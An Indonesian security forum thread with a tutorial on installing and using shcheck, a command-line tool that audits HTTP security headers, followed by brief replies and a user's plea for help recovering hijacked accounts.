Sekian 😐
gan, kok hostnya dah ga ada ya kalo di nslookup ataupun di-ping?
 

2 ) [ Shcheck ] Analisa Security Header​



Saat melakukan pentesting aplikasi berbasis web, salahsatu yang harus diperiksa adalah sudah benar atau tidaknya penerapan security pada header website tersebut. Biasanya saya melakukan pengecekan melalui website securityheaders.com dimana output dari website tersebut termasuk yang paling lengkap.

Namun jika kalian lebih prefer menggunakan terminal saat melakukan pengecekan, saya merekomendasikan salahsatu tool dengan fungsi yang sama, yakni :
Github -> https://github.com/santoru/shcheck
memiliki fungsi : untuk memeriksa implementasi security pada header, serta menampilkan output warning jika ada header yang kurang.

Cara Install Shcheck
Berikut beberapa cara instalasi Shcheck:

Menggunakan Pypi
Pastikan python3 dan pip3 sudah terinstall di sistem. Selanjutnya tinggal install shcheck menggunakan command :
Code:
•sudo pip3 install shcheck
•shcheck.py -h

Menggunakan Docker
Pastikan docker sudah diinstall di sistem. Selanjutnya jalankan perintah berikut untuk membuat container dari shcheck.
Code:
•git clone https://github.com/santoru/shcheck
•cd shcheck
•docker build -t shcheck .
•docker run -it --rm shcheck -h

Dari Source
Atau langsung jalankan saja file source shcheck dari repository Github.
Code:
•git clone https://github.com/santoru/shcheck
•cd shcheck
•./shcheck.py -h

Untuk melihat opsi yang tersedia, kalian bisa gunakan flag -h.
Code:
Analisa Security Header pada Website Menggunakan Shcheck
Rabu, 13 Oktober 2021
Analisa Security Header pada Website Menggunakan Shcheck. Saat melakukan pentesting aplikasi berbasis web, salahsatu yang harus diperiksa adalah sudah benar atau tidaknya penerapan security pada header website tersebut. Biasanya saya melakukan pengecekan melalui website securityheaders.com dimana output dari website tersebut termasuk yang paling lengkap.

Namun jika kalian lebih prefer menggunakan terminal saat melakukan pengecekan, saya merekomendasikan salahsatu tool dengan fungsi yang sama, yakni shcheck. Tool yang dibuat oleh santoru menggunakan bahasa Python 3 ini memiliki fungsi untuk memeriksa implementasi security pada header, serta menampilkan output warning jika ada header yang kurang.
Cara Install Shcheck

Berikut beberapa cara instalasi Shcheck:

Menggunakan Pypi

Pastikan python3 dan pip3 sudah terinstall di sistem. Selanjutnya tinggal install shcheck menggunakan command

sudo pip3 install shcheck
shcheck.py -h
Menggunakan Docker

Pastikan docker sudah diinstall di sistem. Selanjutnya jalankan perintah berikut untuk membuat container dari shcheck.

git clone https://github.com/santoru/shcheck
cd shcheck
docker build -t shcheck .
docker run -it --rm shcheck -h
Dari Source

Atau langsung jalankan saja file source shcheck dari repository Github.

git clone https://github.com/santoru/shcheck
cd shcheck
./shcheck.py -h
Untuk melihat opsi yang tersedia, kalian bisa gunakan flag -h.

❰nino❙~❱✔≻ shcheck.py -h
Usage: /usr/local/bin/shcheck.py [options] <target>

Options:
  -h, --help            show this help message and exit
  -p PORT, --port=PORT  Set a custom port to connect to
  -c COOKIE_STRING, --cookie=COOKIE_STRING
                        Set cookies for the request
  -a HEADER_STRING, --add-header=HEADER_STRING
                        Add headers for the request e.g. 'Header: value'
  -d, --disable-ssl-check
                        Disable SSL/TLS certificate validation
  -g, --use-get-method  Use GET method instead HEAD method
  -j, --json-output     Print the output in JSON format
  -i, --information     Display information headers
  -x, --caching         Display caching headers
  -k, --deprecated      Display deprecated headers
  --proxy=PROXY_URL     Set a proxy (Ex: http://127.0.0.1:8080)
  --hfile=PATH_TO_FILE  Load a list of hosts from a flat file
  --colours=COLOURS     Set up a colour profile
  --colors=COLOURS      Alias for colours for US English

Berikut contoh penggunakan shcheck.
Code:
shcheck.py https://blog.linuxsec.org -i -x -k -g
Gambar :
ME59DUT_o.png



Untuk lebih jelasnya YouTube tentang shcheck di sini :


Sekian 😐

wah ilmu baru nih, thanks a lot gan
 
Mohon bantuannya orang baik, aku habis kena tipu, jadi ceritanya lagi butuh uang banget buat bayar tunggakan uang semesteran adik, kebetulan ada jasa di Facebook jual akun mobile legend, singkat cerita aku kena tipu gan, setelah aku kasih akun gmail sama akun facebbok yang terkait sama mobile legend akun aku diblokir sama si penipu, akun gmail sama Facebook aku yang terkait akun mobile legend gak bisa lagi gw buka, password, email pemulihan, dan nomer HP pemulihan di ganti semua sama si penipu.
MOHON BANTUANYA ORANG BAIK. MOHON BANGET BANTUANYA BUAT BALIKIN AKUN GMAIL SAMA FACEBOOK AKU, JUJUR AKU GAK BISA NGASIH UANG JASA ATAU APA, SOALNYA AKU JUGA LAGI GAK ADA DUIT SAMA SEKALI, MUNGKIN DIANTARA KALIAN ADA ORANG BAIK YANG BENER BENER IKHLAS NOLONGIN AKU,TOLONG.
 
Bimabet
menarik bang. ijin nyimak
 
Jav Toys
Gaple Online Indonesia
Pasang iklan hanya lewat CONTACT US
Back
Top
We are now part of LS Media Ltd